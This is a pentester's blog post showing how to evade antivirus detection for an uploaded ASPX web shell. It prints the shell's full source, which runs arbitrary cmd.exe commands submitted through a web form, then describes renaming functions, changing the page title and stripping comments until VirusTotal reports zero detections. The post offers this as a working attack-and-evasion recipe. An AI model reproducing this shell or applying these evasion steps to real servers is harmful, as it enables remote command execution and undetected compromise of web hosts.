EASY TRICK TO UPLOAD A WEB SHELL AND BYPASS AV PRODUCTS

During a Pentesting Engagement I was able to identify an unrestricted file upload vulnerability. The logical step was to upload a web shell and compromise the server. The web server had an antivirus which was stopping the upload and the execution of the web shell. During the assessment I was in a hurry so I used standard ASPX shell from Kali Linux.

In this article I will take a sample web shell from here https://github.com/rustyrobot/fuzzdb/blob/master/web-backdoors/asp/cmdasp.aspx and show how can we utilize trivial techniques to bypass the antivirus product and get the shell uploaded successfully.

The web shell code looks like the below “you can check the same on the website”
<%@ Page Language="C#" Debug="true" Trace="false" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>

void Page_Load(object sender, EventArgs e)
{
}
string ExcuteCmd(string arg)
{
ProcessStartInfo psi = new ProcessStartInfo();
psi.FileName = "cmd.exe";
psi.Arguments = "/c "+arg;
psi.RedirectStandardOutput = true;
psi.UseShellExecute = false;
Process p = Process.Start(psi);
StreamReader stmrdr = p.StandardOutput;
string s = stmrdr.ReadToEnd();
stmrdr.Close();
return s;
}
void cmdExe_Click(object sender, System.EventArgs e)
{
Response.Write("
“); Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text))); Response.Write(“”);
}

<HTML>
<HEAD>
<title>awen asp.net webshell</title>
</HEAD>
<body >
<form id=”cmd” method=”post” runat=”server”>
<asp:TextBox id=”txtArg” style=”Z-INDEX: 101; LEFT: 405px; POSITION: absolute; TOP: 20px” runat=”server” Width=”250px”></asp:TextBox>
<asp:Button id=”testing” style=”Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px” runat=”server” Text=”excute” OnClick=”cmdExe_Click”></asp:Button>
<asp:Label id=”lblText” style=”Z-INDEX: 103; LEFT: 310px; POSITION: absolute; TOP: 22px” runat=”server”>Command:</asp:Label>
</form>
</body>
</HTML>
<!– Contributed by Dominic Chell (http://digitalapocalypse.blogspot.com/) –>
<!–    http://michaeldaw.org   04/2007    –>

I saved the file contents as cmdasp.aspx “during the engagement Symantec was deleting the web shell file and I had to turn it off”. As a test I uploaded the file to VirusTotal and as you can see in the below screenshot 23 out of 55 AVs detected the file as malicious

FirstVT
Initial AV detection rate

By then I felt that I have to do something to get my juicy web shell uploaded to the client web server. I started to modify the code when I realized how easy it is to bypass signature based AV’s. Here is a walkthrough of what I did to get 0/55 AV on VirusTotal for my web shell.

I started by removing the comments about the owner and I mean the last 2 lines exactly line 41 and 42 on SourceForge. I then went to the title and modified it to something else “we will use OffensiveBits here”. I uploaded the file to VirusTotal and the surprise is that the number was decreased from 23 to 4

secondVT.png
Second AV detection rate

 

As you can see above this easy trick decreased the number in a way that I didn’t imagine. During the assessment Symantec was still deleting the file, so I then went to change function names and added some random comments. I changed the function named ExcuteCmd to myexec and the function named cmdExe_Click to mycmdEXE. I changed the label text to something else as well. The modified code looks like below (The modified parts are highlighted)

shellaftermodifications.png
Modifications to the Shell File

The surprise is that I uploaded the file and got the following interesting result from virustotal

AVs-Bypassed
Zero Detection Rate on VT

By doing these small changes I was able to upload my awesome web shell to the client’s website and was able to compromise my way through his IIS server. By doing these simple changes we were able to evade all AV products and get our shell uploaded in less that 5 minutes of work.

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s